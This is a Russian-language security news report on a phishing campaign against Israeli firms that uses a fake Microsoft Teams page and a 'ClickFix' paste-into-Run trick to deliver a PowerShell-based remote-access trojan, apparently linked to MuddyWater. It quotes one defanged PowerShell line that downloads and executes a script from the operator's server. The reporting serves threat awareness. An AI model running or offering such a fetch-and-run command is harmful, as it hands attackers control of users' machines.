13/08/25
Преступники задействовали заражённую внутреннюю почтовую систему и рассылали убедительные сообщения по региональным адресатам. Эта волна запускала многоступенчатую цепочку на базе PowerShell без каких-либо внешних исполняемых файлов: в финале на хост попадал троян удалённого доступа (RAT), работающий целиком в скриптовой оболочке. По совокупности признаков риск высокий: утечка данных, скрытое наблюдение, закрепление в среде и перемещение внутри сети. Это пишет Securitylab.
Приманка выглядела как приглашение на «наставническую встречу о действиях в период военных угроз и обращении с медицинскими и фармацевтическими запасами». Получателей просили поделиться материалами с коллегами, что увеличивало охват внутри организаций. Переход по ссылке вёл на поддельную страницу Microsoft Teams, копирующую интерфейс и предлагающую «Continue on this browser». Далее на экране появлялась подсказка: нажмите Windows+R, вставьте из буфера длинную строку и подтвердите Enter — социальная уловка, скрывающая запуск вредоносной команды PowerShell через диалог «Выполнить».
Разметка фишинговой страницы содержала строку Base64, разбитую на три части; после склейки и декодирования она давала команду на загрузку и исполнение удалённого сценария:
powershell IEX ((Invoke-RestMethod -Uri hxxps[:]//pharmacynod[.]com/Fix -Method GET)[.]note[.]body)
Эта строка инициировала обращение к серверу оператора и передавала управление следующему этапу.
С атрибуцией однозначности нет. В наблюдаемом инциденте противник последовательно взламывал израильские компании в течение нескольких дней и использовал каждую скомпрометированную площадку как отправную точку для следующих целей — приём характерен для MuddyWater. При этом есть отличия: сознательный отказ от RMM-инструментов и публичных файловых хостингов, ставка исключительно на PowerShell, стартовый приём «ClickFix» вместо стандартных дропперов. Инфраструктура, региональная направленность и приёмы работы со скриптами во многом совпадают с прежними эпизодами, однако уникальная последовательность стадий оставляет пространство для сомнений: либо эволюция подхода, либо другой актор, заимствующий привычные тактики.
Для скрытности применялась многоуровневая обфускация и маскировка трафика. Полезные нагрузки и ответы C2 кодировались и сжимались (двойной GZip, Base64, реверс строк, замена + на _ для совместимости с URL). Для транспорта использовались нативные вызовы .NET, в заголовок подставлялся реалистичный User-Agent через urlmon.dll, применялись учётные данные по умолчанию и системные прокси-настройки — всё ради сходства с обычной пользовательской активностью. В отчёте также приведено сопоставление этапов операции с матрицей MITRE ATT&CK .
